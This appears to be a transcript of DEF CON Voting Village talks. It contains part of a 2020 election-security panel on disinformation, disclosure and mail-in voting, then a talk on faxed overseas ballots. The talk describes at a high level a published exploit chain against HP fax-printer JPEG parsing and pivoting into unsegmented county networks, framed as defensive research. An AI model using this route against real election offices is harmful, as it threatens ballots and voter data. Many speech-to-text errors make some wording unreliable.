the outcome of the election, that's the important thing. Yeah, and just to follow up on what Jack said is election night is not the end of this. For starters, any kind of disinformation campaign that we've been talking about, that's going to happen way before election day. Like I mentioned, I get to vote on October 13th, so look for something exciting happening around, I don't know, first to second week of October. Almost like that's the time when your fear ganglia should flare up around what's going to be happening around disinformation. And just one other super quick point, Jack is also totally correct that I would be shocked if we had results election night. Now it doesn't mean it's the end of democracy. There will not be rioting in the streets over this. We've done this before. Some people on this call are old enough to remember the 2000 election and we remember that that was weeks and weeks and weeks of will they won't they, which ended up in the Supreme Court decision. So that did not destroy America and not having election results at 1am on November 4th is not going to kill everybody. We'll be fine. We'll be fine. Yeah, that does bring up a good point or subsequent question here. It's kind of talking some of the logistical errors. To put on election is not as easy as everybody kind of thinks. Like you just go in there and pull the handle if you're in manual. It is way more complicated. It is way more complicated. Just watching Matt blazes Twitter feed sometimes and just how simplistic some of the suggestions are and of course Matt being Matt fires back and Matt's way and whatnot and that's not enough on him. It's just to try to educate people that this shit ain't simple. As much as I railed on my trip to the DMV recently, I sat in the car and kind of pondered everything required to kind of make my trip better and I'm just like, oh my God, that's a lot to move. That's Sisyphian in a way. But obviously one of our bigger challenges, obviously the thing that made the biggest press right after our February conclave here was the Iowa caucus. I wrote a long paper on this about the whole DevOps process in regards to how it was developed. But the Iowa caucus were the Georgia primaries, which some would say was kind of a predictable outcome of what kind of a cluster fuck it would be. But the other issue is underscore the potential about how trust is eroded through procedural process error by no fault or intent of the creator of that error. It was more or less like we're forging new areas of election, things we can do and mistakes will be made. There was no necessarily evidence when looked at that interference necessarily occurred. But when basically these things that we do in so nice a word shit the bad, what are the different ways that we can as professionals in the security and election security arena kind of capture the discussion and say, this shouldn't erode trust. This is us trying something new. Mistakes will be made. Morale will be lowered. But what are some things at the technical level to kind of, as I mentioned, you have a lot of technical people that will swoop in and say, oh, we can fix this with this. I mean, for instance, it's so lightly joked about. But what are some things, some practical techniques we can have to kind of educate some people on like, no, no, no, this is a big ship to steer. This is what you can expect. Don't lose trust in this. Great. So first, just to really underscore the point that running elections is incredibly hard. There's so much more than just kind of from a voter's perspective showing up to say a polling place, casting your ballot. There's so much more that goes into this process. So many months of preparation. That's a difficult task. And every single election official I've talked to is incredibly motivated and wants to make sure that elections run smoothly and that their people can, you know, free and fair manner decide who will win the election. So just thinking about like going back to February, say it was already shaping up to be perhaps one of the hardest elections that election official has had to run just because we are in an incredibly polarized environment. We know that there is foreign interference that occurred in 2016 and we can expect again in 2020. So even from that perspective, this was a hard task. And then you add the pandemic and everything becomes so much more complicated because suddenly we can't vote entirely in the same way as we're used to voting and all of these processes have to change. In a lot of cases, like I said, election officials now have to scale out mail-in ballots at 10 times the capacity. And when your machines process those, we're only intended to do, say, a small percentage of voters in your jurisdiction from a technical perspective that can be very difficult and things can break because we're rapidly scaling out these technologies and things can and likely will go wrong. So from that perspective, what should voters expect? So I said before, be patient, election results may not come in immediately and that's fine. I think the second point there is really to expect things to go wrong, but don't immediately believe that that is a result of interference of any kind because most likely explanation is that's just some routine error that occurred and that will be worked through. There's process in place in order to handle these types of failures. We have for the most part paper trails that allow verifying elections. So from that perspective, we have controls in place. And yes, technology can be brittle and stuff can break down. But a lot of times just look for the most likely explanation that, of course, interference is still possible and we should be very concerned if that does happen. But just looking from what is most likely to happen, it's more likely that we can almost assume that some technical failure and some capacity will occur, but that doesn't mean that's malicious. And the people just have to view it as that way and understand that there are still controls in place. Yeah, Alchemist's razor is good. I can't remember if it's Hanlon's razor or Occam's razor, but it's one of the razors. It's Hanlon's. Yeah, anyway. Yeah, it's a simple lens, Malus, anyway, whatever. We can probably look that one up after the fact that I'm outing myself and not knowing which razor is which right now. I've got to that. No new stuff in 2020, like time out. There's a whole bunch of innovation happening in the election space, which I think is fantastic. And I think it's important. It's going to be critical after this is done. But the addition of variables, the idea that there's software files, which is the second point I'm going to make, but the failure rate of software is directly proportional to how quickly it's been brought to market and oftentimes how mature it is. So this idea of like, cool, let's just blast 2020 with a whole bunch of brand new stuff that we haven't really tested. Ultimately, when you go back to Iowa and do a bit of a root cause analysis, that's sort of most of what happened there. It was less than six weeks when I did the analysis. Yeah. Yeah, it was, and it's logically what would happen again if we deal with other stuff. So no new stuff. But then this other idea of like software, in terms of again, coming back to how we can help. Humans make mistakes, period. This is why we've got an industry is because while we come up with all these incredible ways to do stuff, including democracy itself, we do make the occasional spelling error and then there's bad people that want to manipulate that to get what they want. So this idea of like, to err as human, it's more about how you respond. Again, it's part of what I like so much about, you know, vulnerability disclosure as a process, but also as this like leading indicator of maturity when it comes to security of an organization that can translate to trust. I think that's a concept that isn't very well understood. And I think a lot of the time people, you know, on the operations side would prefer to just do ostrich risk management and pretend it didn't exist. But I think it's going to become pretty important in context of all of the stuff that can and probably will go a bit funky this year. Casey, you have some of the best vulnerability disclosure jargon around. I love it. I've been practicing. Yeah, a little. Yeah, like, I guess I would just say as as technical people who are probably the only people watching this. You know, I think what you can you can do your part by not freaking the hell out when you see something that goes wrong, like, you know, just to echo, you know, Jack, Jack and Casey, it's like it is it is a hand lens razor kind of thing. There will probably be mistakes. You know, I don't I don't think I would go so far as to say like it's super I got a medisplate shirt on it's very hard for me to say like don't disclose vulnerabilities. But you know, maybe not on Election Day, and maybe not make a bunch of hay about like hackable voting machines like that is kind of the least of our worries if all we had to worry about was a hackable voting machine like that physical device. Boy, that would imply that we've fixed so many other problems in in infrastructure and disinformation in in everything up and down the line. So, you know, I would hope that, you know, the folks that work in the space who pay attention to things in voting village, you know, maybe not completely lose your cool over a, you know, a voting machine that can be hacked in person. So I'll do a quick response and I'm sure Emily wants to move on. But this goes back to something that I said in February. And it's a recurring theme because I feel like I say it a lot. So we've heard it before suck it because I'm going to say it again. But the biggest service that we can do to the American people as security professionals is somehow convincing them that their votes don't count. And we do that by constantly preaching that the system's broken, the voting machines are hackable, the infrastructure is flawed, the voter registration system is, you know, something that can be tampered with. It's not to say these things aren't true. But also like you have to qualify those ramblings and and announcements with how often that actually happens and what the likelihood of that happening actually is. And the idea that, you know, hacking 20 voting machines is going to sway an election without even like acknowledging what it would take to actually hack the voting machine, right? Or to tamper with a voter registration system without acknowledging that like, you know, states do have some IDS systems in place. Like, sure, could it happen? Yeah, we can like what if all day long? But if we're if we're putting information out there that even makes one person think, well, my vote can just be changed anyway. So why would I bother voting? Like then we've fucked up like bad because we've kind of shot ourselves in the foot with the thing that we were trying to make better. So we're now in a Section B. So we've now pivoted from where we were six months ago to where we find ourselves in the last 90 days here. 90 days scares me because, you know, coming from the federal government, it takes longer than that mainly to fill out the paperwork for something. So 90 days for us in the real world, if the commercial sector will be totally interesting. But obviously, I'm going to highlight the fact that, you know, as Jack leveled up here, CISA has taken more of an active policy and assistance role for states. The Election Assistance Commission Committee has hired some really great new staff. In fact, some folks who I believe Kimber and I were on the panel and many years ago with and, you know, the feeling that while it's awesome, they hired these people. I don't know. I've tweeted out about it. It's a little too late in certain cases. But, you know, they hire great people. What is the feeling right now that these folks can actually make a difference between now and the election? Or obviously, if we can't do it by then, what are the what is the change that can be made for further elections provided that the world isn't going to melt down? Yeah. So yeah, I think I can take this to start. Yeah, so it's true. Yeah, CISA has brought on some more people to help out with election security. I'm part of a group of me and four other Stanford students who all came to CISA to work specifically on election security. And we've been having a lot of fun being able to work essentially on both the infrastructure component building tools to allow organizations to better secure their systems and allow CISA to say aid and assessments to state and local election officials, as well as working on some of that, say, foreign disinformation component. So in terms of what both, say, CISA and EAC can do by November, I think there's a lot that can still be done. Of course, yes, we have, I believe, calculated this, I think it's 89 days from the time the talk this is airing until the election. And that's very little time, almost nothing. But we still can do a lot. We can help, say, states identify vulnerabilities in their systems. We continue to offer services that assess these systems and give guidance. I mentioned before, we have documents that we published along with the Election Assistance Commission. And we're working to support states in the capacity that we can. So I think that there's a lot that still, of course, needs to be improved, but we're getting there. And from my perspective, yes, the government plays a large role in this, the federal government. And I really do think that states, this is, I'd say, one of the major improvements since 2016. In 2016, the federal government's involvement with the states was not at all near where it was today. So much has improved since then that we are now working with every, each of the 50 states were working with a significant portion of the local election offices and we're in much of our place both to the protecting systems and then monitoring in case stuff does go wrong. So, you know, you speak to obviously kind of the involvement with CISA and, you know, kind of the states taking a more active role in their own survival in a way. You know, have any of the vendors, either of the ePoll books or the election systems been more willing to kind of come forward and work proactively with the government or, you know, say any of the companies represented on here to kind of solve the problems. I know, you know, I've recently been involved with some workshopping with OECD on regards to vulnerability disclosure policies and digital product security. And one of those cases is finding a good mediator sometimes to kind of do that. Has anybody kind of moved that way or are we still kind of like, you know, kind of finger pointing and moving forward there? So in terms of CISA's involvement with this, of course, CISA's preference is for vulnerabilities to be disclosed either directly to the state or to vendors when that is possible. And it is argued that of course vulnerability disclosure policies can be very helpful in this process. I'm not aware of any vendors that have the time of recording or states for that matter that have come up with vulnerability disclosure policies that could very well change between the two weeks when this airs. But what we do offer is resources for those that want to implement vulnerability disclosure policies to do so. So like I mentioned, we have our guide on vulnerability disclosure that will be live by the time this panel airs, as well as the fact that we do serve as a last resort for people who are unable to disclose vulnerabilities for any reason. They can report it to US search, which is under CISA. And we will work to get that disclosed to the vendor in order to mitigate that vulnerability. So CISA does play an important role here. And yeah, it is our hope that of course, yes, that any vulnerabilities that either people come to vendors with or come to us with that they will be addressed. So I mean, and just to follow up on that, I mean, we're getting we're getting under the wire at the wire, right, for for the November 2020 election. If if I were the king of vulnerability disclosure, I think I would direct people to disclose to you personally, Jack, and, you know, by extension, this is a before vendors and states like, I mean, I think that's kind of the the the way like, let's say I'm sitting on a vulnerable or I find a vulnerability in some election system or whatever, like, and I'm a hacker guy who wears that split to this. Like, I have it. I don't want to not tell anyone about it. You know, there is this like, it's okay to yell fire in a crowded theater if the theater is actually a fire business. I think it's it's probably not great to like drop that on Twitter and just full disclose and do that. I mean, that's not helpful. I don't think in in the slightest. But I do think like you tell me like I my my instinct is, you know, tell SZA and hope for the best and keep my mouth shut until November, I don't know, 1015 or something. You know, so at least this is where they can do. I'm describing your job at you. Yeah, you can do instrumentation, right? Like, so even if there's no fixes, there's still ways to track the vulnerability. Yeah, yeah, and you're exactly right there that yes, the priority is for the vulnerability to get fixed as quickly as possible. And we want to support whatever will make that happen as efficiently and smoothly. So of course, it's ideal if it is possible to disclose directly to vendors, but that is hard one. There are no disclosure policies today. In that case, yes, exactly. So, so given that the current landscape, yes, SZA does serve as a coordinating role there for people who can't really find the contact to disclose, they can come to SZA and SZA will work to make sure that the vendor or the state is made aware and that the vulnerability can be fixed. Yeah, I mean, hard, hard agree with, with Todd's suggestion of going to SZA, especially at this point, you know, keeping in mind as well that like with the 90 day kind of lead time that we've got, the vendors are very likely to be distracted and have lots of other things on their plate, just from a pure logistical standpoint before you go layering on the pandemic and the fact that 2020 is generally a bit of a shit show. You know, the thing that I wanted to double click on is actually around basically nondisclosure of findings ahead of November at this point. And this is very much opposed to how I normally talk about vondisclosure. It's very hard to say. I want things to run. Yeah, it's really, it's a really, it's a really difficult thing to say. We actually talked about this in terms of the boilerplate election policy that we put up on disclose. I, and we've got it in there. It's like, you know, basically the agreement is not to disclose until after the election is finished. Ordinarily, that timeline would serve as, as back pressure on the vendors to fix. And I think that's a really good and important thing for accountability and transparency. But the risk of frightening a non technical voter into just giving up and not showing up to the poll booth as a product of trying to do something good, I think is extremely high on this particular topic at this particular point in time. So yeah, it's a hard pill to swallow. I think for security researchers in general, it was definitely, you know, from where I, from what we do and where I sit, it's a hard thing to say, but I actually do think it's the right thing for this year. Yeah. Yeah, I know that's one of those, those things we've kind of, you know, as I mentioned with some of the policy making, you know, obviously federal, international, but not, you know, we've set the, I wouldn't say necessarily artificial 90 day deadline, but obviously for inside the 90 days, it does kind of create an unworkable framework with both in the timing, I think the regulatory environment for whatever folks need to do for certifications, plus loading all the election information, the logistics of that. So, you know, it just creates this, this whirlwind of not a good situation for us to be in. So yeah. So yeah, we talked about this, you know, earlier in regards to kind of the effect that COVID-19 has had on how we staff the election, how we are attending the election and participating it obviously with retirees and whatnot. There is so much dumpster fires being poured into the alley right now. It's not even funny. And obviously with the disinformation and just all the stuff we talked about, if you are all betting people and if we were in Las Vegas this year instead of doing this virtual, what would you bet to be the first thing to crumble out of all of this? What do you think is the first thing that is just like, you know, the guy from Oz comes out behind the sheet and says, yep, everybody go home. We're fucked. Um, if I was a gambling person, which I'm not, um, I think it would be if we're talking about the first thing to just go like shit house on fire, what do we do is a bunch of maybe rebellious folks who would show up at polling places without masks and like fake cough and just make a big to do and just try to disrupt, you know, the peaceful line at the voting place. Right. Like I think that, sure, I think we'll see people tweeting, oh, I got a mail in ballot for my uncle who died last year and then it gets 10,000 retweets and then somebody else tweet something similar. Like I think we'll see that, but like just for shit house election day, like what are we going to see on the news? I think like polling places being disbanded for like civil unrest and not from the folks who are there just to vote peacefully. So this is starting to form like a John Carpenter movie in the worst way possible then. Well I am a horror fan. So of course that's where I go. My hope is that people respect democracy regardless of which side of the line you fall on and just let people have their constitutional right to participate in electoral process. However, I am currently disenchanted by the state of the country right now. I don't know, I think that your first sign of everything going to hell is going to be on like in the neighborhood of October 13th, October 14th. That's going to be where you have your last big push of whatever disinformation campaign is going on. I'm not a disinfo expert by any means, but if I were going to own stuff, I would definitely want to tell people that like one of the tactics we've seen over and over again of people who are attacking election systems is that it's no good unless you tell people about it, unless you get noticed. And so you've got to get noticed like early enough to sway elections, but not so early that you know there's enough from, you know, that Jack can fix it for us. So like October 15th, I think is the sweet spot for that. What is that? That's like Wednesday, I think, or Thursday. On Friday, not on Monday, early October, I would expect to see, I was expect to see big news to try to have that last push of, hey guys, don't bother voting. And you think that because that's when the mail in voting window opens. That's when most states in many states, absentee ballots are starting to get filled out then early voting starts at then. And it's still early enough that you can make hay about it for the following two weeks, like a losing side can call cyberfoul pointing at that thing for, you know, and just eat up, eat up news for the rest of October. Just this is, you know, it's a bit personal, but it goes to one of the reasons that I'm not in the US right now. I think, you know, we had the option to be near family and write out the pandemic, you know, part of the concern that was in the back of my mind was how, how, you know, the potential for civil unrest and those sorts of things are amplified by the backdrop of the pandemic and economic depression and all that other stuff. So I think the number of things that are available for an active tweak on and the amount of leverage that's present, you know, as we do version two of this panel is radically different to to what it was, you know, last, last time we got together in Sparrow. So, you know, from, from a mitigation standpoint, it really does come back, you know, for the, for the typical audience of this, this panel in DEF CON is making sure that, you know, adding to the problem, you know, the whole idea of like polarization of just general distrust like nihilism or that sort of stuff. And I do believe like we are talking, you know, Armageddon-ish type stuff at the moment, but I do believe fundamentally in like working back from the worst case scenario and then optimizing the critical path from there. So it's an important conversation to have. Yeah, that's a good segue into the last question we're going to do today. So, you know, obviously we talked about mail-in voting as the next best mitigation for forcing people to kind of show up in person and definitely a better alternative than I'd say any potential half-baked e-voting solution at the last minute that would come in and swoop. But obviously with the rhetoric that's been, you know, spoken by various folks in the press from various levels of government and elsewhere about the validity and trustability of the Postal Service as well as their own financial woes imposed upon them by Congress and pre-funding and so forth and so on. You know, it was just announced today that they had worked out a deal with a massive infusion slash loan from the U.S. Treasury. I think it was like $15 billion, which is a huge chunk of change. It does keep people from necessarily having to rush out and, you know, running for stamps. But obviously I have reports from some of the locals here in the D.C. area, specifically Baltimore, about potential fallout from the recent Postmaster General coming in and saying, please delay first-class mail. Obviously that puts a downward pressure on delivery of mail-in voting as well as, you know, returning that and making sure that everyone hits with the deadlines with the post-marks. So where we sit here is our last best effort to run a secure election as a Postal Service. It is in dire straits. It has potential leadership that is working anathetically against the essentially constitutionally or, you know, state that the Postal Service exists in. What are the last bits here that we can ensure that that is functioning for us to go forward? Are there ways that maybe we move up early voting even sooner so that we kind of play into the logistics of extended timelines? Is it write your senators and make sure that mail is delivered in a timely fashion? Or, you know, some other aspect of it. You know, with that, especially, you know, as you mentioned earlier too, I think it was Todd talking about the expected timelines being a lot longer for us to hear the outcomes. You know, if we have this extended timeline, what's our expectations to actually, you know, hear what the outcomes are going to be given us? I mean, it would be great if states would extend their deadlines. I was shocked to see that Texas, for all the hand-ringing Texas has been doing about mail and ballots and trying to make that hard. The fact that Texas then turned around and extended early voting was a sweet surprise. You know, I don't know. We do things randomly here in Texas. Some things are great. Some things are not so much. But I guess that's just here local in Texas. I don't know. I feel like everyone should mentally hug a postal worker today. They do a lot of really hard work. A lot of people depend on them for a lot of things. You know, they are in fact constitutionally enshrined. It's an Article 1 power of Congress to establish the post office. And the fact that it became a target for disenfranchisement is just mind-boggling to me. But I think that we can all agree that the post office is kind of a wonderful Americanism really. Like, it was a largely, this notion of a single stamp that carries something across the country. Like, that is, I'm not really sure. It might be in English. It might be a British thing. But one or the other, it's pretty great. So, yeah, like, I mean, if you have the opportunity to vote absentee, absolutely do it. You know, absentee voting, you can get all nerdy about it and say like, well, technically you're violating like the secrecy of the ballot by doing that because someone can watch you vote and direct you vote and see that you vote correctly and see that you put the thing in and mail it away. But that's almost a, like, that is so low on my list of problems when it comes to democracy is vote selling. You know, if it turns out that's a big deal, great. Like, let's go tackle that. But it is, it is not, that has not been a problem since like the 19th century. So, yeah, I want to say too, we've seen the current administration, we've seen the current administration actively attack the postal service on social media. And so, you know, I would ask folks to understand that I don't think there was a long game there, but I don't think that it's going to be unreasonable to see more attacks on the postal service from the current administration. The unreliability, the conspiracies about deals with Amazon and then how Jeff Bezos ties into Amazon and then with the Clintons, like, there's a lot of, there's a lot of stuff to unpack there. But I would say, you know, at the end of the day, like, these are feds, these folks are feds, they took the same oath to the Constitution that other feds take. They're there to just do their jobs every day. And the idea that postal workers themselves would be tampering with mail-in ballots is just kind of ridiculous. And it's completely insane. It really is ridiculous. And if there were one, it's a blip on the radar if the numbers are out there, a folks voting, right? So, so let's just keep it all in perspective. And to understand the importance of the postal service, when I was younger, the DMV test had a question that said, if you get to a four-way stop and there's a fire truck, an ambulance, a police car, and a mail truck who has the right away. And everyone assumed, like, the ambulance or the fire truck, but it was, in fact, the mail truck because they are protected under, you know, the guys of the federal government. Only a mail truck wouldn't go first, but they could. And also, if you hit a mail truck, you get into a lot of trouble too because you've damaged federal property. So, you know, you probably don't want to go out and take your angst out on vandalizing mail trucks or bothering the postal workers. So I just... That is a hot tip. I feel like... Robbing post offices used to be a hanging crime. Yeah. Well, they've also got that crime of daybook that just came out from the Twitter feed. I would hope that there's a chapter in there about weird stuff like that. So, all right. Then last thoughts on what we see as our future here. What you'll be doing, what you hope others will be doing, and then where do you hope we will be? I can go and take this first. So yeah, nothing I'm going to say here really is anything new, I would say, that I haven't said. But yes, in terms of what I'm doing, what CIS is doing, we are going to be working through and after the election to support election offices at the state and local level to ensure that they have what they need from a security perspective. And we're committed to doing that. In terms of, I think, what's maybe more valuable is what people watching this, what steps they can take and what steps they can recommend others to take. And this goes back to the two points that you have to be patient and you have to expect that things may go wrong, but that doesn't necessarily mean there has been interference and that doesn't mean that the election is invalid. So be patient. Do not assume that results will come out on election day. May take some time, but have faith that election officials are doing their best to have an accurate result, that we have process in place that if interference does occur, we can identify it and just ultimately the main thing is that the people of America need to have faith in their own elections and that can go away without any actual tampering occurring, without any interference. Just if the people do not believe that their result was valid, then the result is not valid. So I think to everyone watching this, just to understand that what you believe happened matters and just to understand their process in place, their committee election officials, the federal government is here to support that process. And yeah, let's hope that we have a smooth, free and fair election in November. Sure, so I guess to just kind of reiterate what everyone else has said, the best defense against any election shenanigans is voting and voting in numbers that are too hard to push one way or the other. If people go and they vote, especially people who have historically been disenfranchised or haven't felt the need to go vote, it is here at every election, but this election is literally the most important election of your life so far. And so go vote and hopefully if enough people do that, any kind of shenanigans will be drowned out by the overwhelming signal that we have. Me personally, not only am I going to vote early, I'm very excited to do that, but I'll be working the polls. It's going to be crazy. It'll be November and there will be no vaccine. And so I will be doing a lot of cleaning and hoping that not too many polls close that day. You know, there were poll closures. In our last election here in Texas, there weren't any poll closures like on the day of. You know, people did show up, they got enough recruits to come and do the thing. I did have a couple poll workers not come to my polling place, but we had enough people to pull it off. So hopefully that will remain the case. But that's going to be November. So who knows what the pandemic will bring us. If it becomes impossible to vote in person in any kind of crowded way, then we'll just have to deal with that as it comes. But if you have the bandwidth and the health to throw in for a, what is a super fun sounds boring, but it's actually pretty fun like 14 hour a go, go with the polling place. I'll go next. I will say that I'm very much looking forward to returning to the U. S. And this is honestly a part of that. So again, on a speaking to the subject matter, but speaking to it from a very personal standpoint, it's like my adopted country is trying to figure all of this stuff out. And I'm looking forward to being past it is something that, you know, I'm, it's heavy. It's the heavy thing. So aside from that, practically, you know, if you for the hackers find out how people where people are asking for help, go help them, like look for the stuff that people have already volunteered, you know, the volunteering stuff that we talked about at the start, just to reiterate that some of that help might be it go looking for it. See if you can find opportunities to provide your skills into those different areas. Help out on the open source projects. And some of the other things that are going on that have been volunteered. So I'll, we mentioned before, verified voting, it's up on GitHub, go bang on the source code. And if it's legit, say so. If there's a problem, submit a PR, help make it better. If there's, if these audits are a part of, of how we have a peaceful kind of acknowledgement of the count after the fact, then you'll have played a pretty big role in that, I think. And then finally, you know, don't, don't scare your grandma between now and November. If you're doing security research and you find something, you know, talk to, talk to Jack and the crew at CSUR and Sir, try to talk to the vendor. Just be very mindful of the fact that dropping any kind of anything that looks like a vulnerability on the internet right now is highly, highly exploitable from actors from a disinformation standpoint. And that's going to be part of the problem. Technically, you have a last couple of days because July sucked when it came to Volums. So, or at least people had to clean up after Volums. So let's, let's make August better. We can, we can, it's, it's, it's DEF CON months. So the internet's on fire this month anyway, but maybe after that, I don't know. October, let's let October be quiet then. That's cool. Kimber, any last? I, it's unprecedented. So it's, it's anyone's guess what actually happens on election day and, and the months following. Um, vote, just vote. I tell your friends, tell your family, vote, vote safely, um, vote mail in if you can. If you pay attention, your state may have deadlines or your district on when you have to let them know that you're going to be voting by mail in ballot. Some folks, some folks here didn't understand there was a two part process to mail in ballot. You had to request one to receive one. It didn't automatically get sent to you. So just being aware of how your local districts work when it comes to mail in ballots so that you can participate. And if you have to go to the polls, you know, wear a mask, social distance, if you can, and you don't have high risk folks at home, volunteer at your local polling places and do what you can to make it safe for our most vulnerable populations to be able to get out and have their voices heard. Well, yeah, that's a great thing to end on. You know, obviously I have a spouse who's immunocompromised. So, you know, I preemptively requested a mail in mail in ballot. But I know some states require a extenuating excuse in order to get a absentee ballot. So please check with your local officials on what you can do to do that. Obviously, you know, a safe and secure voting is important, but safe and secure also means individuals as well. With that, I'll close out our panel. I do appreciate Kimber, Jack, Casey and Todd for joining us this evening for the recording. Again, this is the election security part two, the infrastructure strikes back while I can't necessarily drop in some John Williams here. Use your mind's eye as well as the Starfield background to kind of get it through. And hopefully come November, we'll see what kind of shakes out and, geez, maybe next February we'll have a cleanup on this, maybe a part three. Hopefully doesn't end up with a bunch of Ewoks running around saying, uh-nug, but anyhow. Once again, thank you very much and thank you for your time. And take care.
Democracy is the cornerstone of America’s Constitution, identity, and ideology, and this foundation was shaken during the 2016 Presidential Election. Four years later, we still have great lengths to go to ensure that the integrity of the 2020 Presidential Election, and any election moving forward, is protected. In February, this panel convened to discuss the threats and challenges that are present and may arise between then and the November election. We discussed the intersection of people,technology, security, and elections, with a focus on themes including: - The true scope of the problem when it comes to “hacking elections” - The biggest threats to the 2020 vote–threat modeling for disinformation, voting machine vulnerabilities, website hacking, and election manipulation - The role of hackers and coordinated vulnerability disclosure in building voter trust and improve cyber-resilience - The impact for the elections in the west at large, driven by the U.S.’s prominence as the champion for democracy. However, we did not know a pandemic and a constantly changing rhetoric by candidates and government leaders, along with several court cases, primaries and other events would add even more challenges for the 2020 election. We will discuss what is left in the 90 days left between now and the election, what can be feasibly helped by the public, governments, and others to ensure a secure and valid election, as well as what will need to be carried forward as lessons learned.
10.5446/50768 (DOI)
Hi, Vody Village. My name is Forrest Senty. I'm the Director of Business and Government Affairs at the National Cyber Security Center. I'm Caleb Gardner. I'm a fellow at the National Cyber Security Center in Scrizzvill. And we're going to be presenting you our HACA FACTS presentation today. For a little background to start, National Cyber Security Center is a 501c3 center in Colorado Springs. A lot of our focus has to do with cyber innovation and awareness and a lot of our projects have to do with tackle global problems, whether it comes in smart cities, elections, space. Some of our colleagues in the Space ISAC are presenting today in the Earthspace Village. We want to give them good congratulations and a shout out over there. But the big reason why we're here today ultimately is that we want to talk about the gap, the security gap, and specifically it has to do with policy in addition to different agencies and groups. A lot of people ask, why NTC? Why us? Why do we care about some of these issues? And the reality is that between the different groups that exist in the United States that are multi-agency, multi-party, multi-policy, depending on where you come from, whether it's the Election Security ISAC, groups like Verified Voting, MIT, even places like EIC, CISA, CIS, all serve a specific segment. But our focus is on identifying gaps in critical infrastructure. And the presentation you're going to be hearing from us today is going to be talking about that gap. One gap we've identified specifically has to do with the population affecting the overseas voter, or UACAVA. This is specific to the Uniformed and Overseas Citizens Absentee Voting Act. Many of you here at the Voting Village are going to be no secret and surprise to you. You know what this means, you know how many people and, you know, kind of the different challenges these people face, whether they're voting from Afghanistan or Italy, or even from a remote jungle, Amazon. So a lot of what we're focused on today is on this area. So one of the three pieces I want to call out is specific to fax machines, like we mentioned earlier on. Under the current implementation of the move that was established in 2009, 31 states currently allow for ballot return via email and fax. This means that these 31 states have to provide a place for these people that are voting from overseas to provide a place from the sender ballot via fax or email. So knowing this information, and us seeing this different research that was coming out, we want to do a quick breakdown and see how many ballots were actually transmitted back in 2018. According to the EAC, roughly 29,000 ballots were sent. Now this is one of the category of others. So some of these in there could be mobile voting like from West Virginia or a web portal like in Colorado, Montana, Arizona, or Michigan. But 29,000 ballots, although not statistically significant to the rest of the United States, still represents a population that is voting using this method. And this shows that election offices are still allowing for this method and pushing for it even in some cases. Although it has been on the decline, it's important to know that security is still paramount for every single vote that comes out. So now I hand it over to Caleb, he's going to talk a little more about the research that we did specific to fax machines and election jurisdictions and kind of give you a little more of the issue that you have. Thanks, Boris. So first off, we're going to reference you guys back to some presentations that probably made an impression on you when you first saw them. They were specifically focused on fax and printer faxes. So first off in DEF CON 26, we saw a lot of fax from checkpoint research, and that was a big sticking point for me and we came back to that a lot as we went to do our own research and doctorate other counties and cities. So we'll move to the next slide and what checkpoint research really showed us was that it was a possible to exploit printer fax, just with a publicly available fax number. No city or county that I looked for their fax number was not available every single time I can find it for the city quick or the county quick, and which is where you be submitting your vote for if you are one of these Google Cloud voters. So using that phone number, checkpoint research was able to hack print fax and actually they're also able to get to the network behind that print fax if there was on a flat network apology or no segmentation. So we'll talk about how they did that really fast they discovered that in the T 30 protocol. We have access to both data and headers and this enabled us to have full control of the JPEG file. So that's why we use JPEG over any other file type. And over the PST networks, the publicly switched telephone network, we are able to get to that printer fax and use the priority JPEG parser base is we look at HP, but this is probably going to be the case for any of the big solutions that that's your access that HP if that's someone else, they're probably insulating their JPEG parser and then using some sort of open source publicly known security pressure. So since they did that themselves, they found a lot of CBEs and they found a buffer overflow with parts and gauge teamers. And with that, they had a controllable stack based overflow they could do anything with it and they were able to get a great exploit, which they put on the turn blue to the rest of the network. And so it was really great demonstration and definitely six. What could you do with this a lot practically everything you have confidential attacks integrity attacks and availability tax you have a full CIA try add. You're seeing voter registration info, particularly if you're getting through to the network behind these printbacks is you're seeing ballots hopefully not but potentially, and you are able to maybe change those ballots. We, that's something that we're going to look at in the future is if we can get into one of these printbacks is, can we get to those ballots or can we get the incoming ballots and change them before they're stored. And also you have availability tax, you're potentially able to bring down in the entire city or counties and for structure for receiving votes for that election, which would make a recount necessary which make a lot of bad things happen obviously we don't want to be seeing. So any research we did some confidential research with different cities and counties, and we have to keep that confidential we're under in the but we can generalize we can say what are rough takeaways we're seeing from two main different types of cities. First off we have city a this is your medium to large size city, they probably have good infrastructure investment in it, they're probably able to actually hire talented professionals for security conscious, and they're able to enforce strict adherence to best practices as regards to security. These are all great things that you're probably to see a pretty secure off that current facts implementation. We did when we were looking at these types of cities. City be however is the city that we talk about pretty much every time that fun rolls around with voting village that once we're still running the DRV is that we have shown vulnerabilities and every year, you know, it's obviously a urban system that they still implementing, but they're not going to spend the money to fix it and not going to spend any money to become security conscious, so probably a really poor mismanaged IT department, and they probably don't have the patching policies just great posture. So looking at city a more in depth, the things that they have that makes them stand apart from other cities is that they have users segment networks. This keeps their print facts separate from their data servers that keeps them separate from their employee workstations, and it's even segment on a very in depth level so every fire station and police station. There'll be those three things that data servers at workstations and the print servers would all be different things every single location so it's an extremely segment network that keeps you from getting access through that one printer fax so basically city a knows that printer fax is a potential point of intrusion. They probably have good patching policies for the printers. Hopefully they have both a factor in general and also for the effects servers, and they're probably using fax or IP over the PSTM fax t 38 over t 30. City beat however doesn't have any of these things record a flat nerve to apology you exploit the print fax you exploit the network, and they have bad patching bad multi factor authentication implementation and bad security posture. So, if you're the city beat, you're thinking, Well, this is a apply me, you know, do I how can I know. Well, what our high level attack overview is specifically geared towards is what checkpoint research did, and showing that specifically is HP Office Jet Pro 6830 on one prayer. However, it wasn't the printer that had the vulnerability, it was HP implementation the JPEG bursary, you remember. So, HP releases security bulletin in July 2018 talking about this providing patches. Yeah, all city beat saw that maybe the play that patch maybe they didn't even think to apply patch or they're not even keeping in track with their water recycle machine. Yeah, these there was a things are not important to lots of cities, and they're not going to look at security patches when they're available for them. And if you're a CDB, looking to see if you have an issue, but did you buy it after 20, 420, did you apply a patch if you bought before 20 and then it and you're using Christian, you're probably susceptible to attack right now. And so, the things to say about it as well. This says that there's no widely used standard facts encryption. This information set by fax is at risk for the possible interception or modification jurisdictions should carefully lay the risks that transmission over other alternatives. So this is a big deal. And I think this is one of the biggest vulnerabilities that we're seeing in fax and the thing that we'd like to see change the most in the future is the unencryption of it and we would like to see a default encryption method used on fax in the future. So, the only way to make the encryption standard rather than optional would probably be a great step in that direction. They also stress secure location effects machines, because often with T 30 voting records or registration of those might be actually still stored on that machine as it comes through, unannounced to the user. So physical access would allow access to all those. T 30 30 will go over that we quickly if we haven't gone enough over already. So PSN, that's 